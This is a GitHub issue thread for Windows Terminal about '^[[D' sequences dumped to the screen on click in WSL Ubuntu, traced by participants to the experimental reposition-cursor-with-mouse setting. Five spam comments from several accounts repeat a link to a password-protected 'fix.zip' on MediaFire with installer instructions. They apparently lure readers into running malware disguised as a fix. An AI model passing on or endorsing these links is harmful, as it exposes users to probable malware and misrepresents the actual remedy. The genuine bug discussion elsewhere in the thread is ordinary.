### ISSUE TITLE
Getting a large dump of "^[[D" to the terminal on click in WSL Ubuntu Dev

### ISSUE THREAD

**Issue by kj87au** [microsoft/terminal#17803]
### Windows Terminal version

1.22.2371.0

### Windows build number

10.0.22635.4076

### Steps to reproduce

Running WSL2 C:\Windows\system32\wsl.exe -d Ubuntu.

Having "Automatically mark prompts on pressing Enter" enabled.  

Have long running job. "find ." or "docker-compose up"

Clicking the terminal.

### Expected Behavior

Nothing to be added.

### Actual Behavior

Clicking the terminal causes a large dump to terminal. 

If I turn "Automatically mark prompts on pressing Enter" off it goes away.

![image](https://github.com/user-attachments/assets/1ad2cc4d-a80e-415c-98af-4fa20636b3de)

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zadjii-msft** [comment]
I'm guessing you've also got the experimental "Reposition the cursor with mouse clicks" enabled?

I think I've seen this with a `git diff` in the win32 git a few times too, though with slightly different symptoms. I suspect we're sending the arrow keys even though the terminal isn't in the commandline state anymore (now it's in the output).

**Comment by kj87au** [comment]
yep, It only seems to happen when both "Automatically mark prompts on pressing Enter" and "Reposition the cursor with mouse clicks" are enabled in WSL2 Ubuntu at the same time.

**Comment by schlich** [comment]
> I'm guessing you've also got the experimental "Reposition the cursor with mouse clicks" enabled?
> 
> I think I've seen this with a `git diff` in the win32 git a few times too, though with slightly different symptoms. I suspect we're sending the arrow keys even though the terminal isn't in the commandline state anymore (now it's in the output).

what is this setting?  i dont think i've enabled this and i don't see it in the settings, if it's still an option as of today... 

(also running into this issue)

**Comment by mbolli** [comment]
had this as well 

<img width="1409" height="830" alt="Image" src="https://github.com/user-attachments/assets/1e8cbeb9-12ba-4385-9dd8-ebbf6f7f5ccb" />

however I now **enabled** `focusFollowMouse`, and it seems like it's fixed (fingers crossed)

**Comment by sebaspf** [comment]
> yep, It only seems to happen when both "Automatically mark prompts on pressing Enter" and "Reposition the cursor with mouse clicks" are enabled in WSL2 Ubuntu at the same time.

Only deactivating the **"Reposition the cursor with mouse clicks"** (Settings -> Defaults -> Advanced) solved it. 

This happens because the terminal tries to place the cursor where you clicked by "moving it back". You can confirm this if you press the left arrow when the terminal is outputting something. In that situation the cursor is at the end of the last line. Clicking before this position will insert as many left arrows as needed to move the cursor back, but in this situation it will be printed out instead of changing the cursor position.

**Comment by jacktose** [comment]
I can replicate today (on WSL2 Ubuntu) with the first two of these scenarios:

| Setting | 1 | 2 | 3 | 4 |
|---------|-------|-------|-------|-------|
| autoMarkPrompts                        | ✅     | ❌     | ✅    | ❌     |
| experimental.repositionCursorWithMouse | ✅     | ✅     | ❌    | ❌     |
| **Result**                             | `^[[D` | `^[[D` | 👍     | 👍     |

So it seems that the issue depends solely on `"experimental.repositionCursorWithMouse": true` (“Experimental: Reposition the cursor with mouse clicks”).

(`"focusFollowMouse": true` did not fix it with the other two enabled (condition 1).)
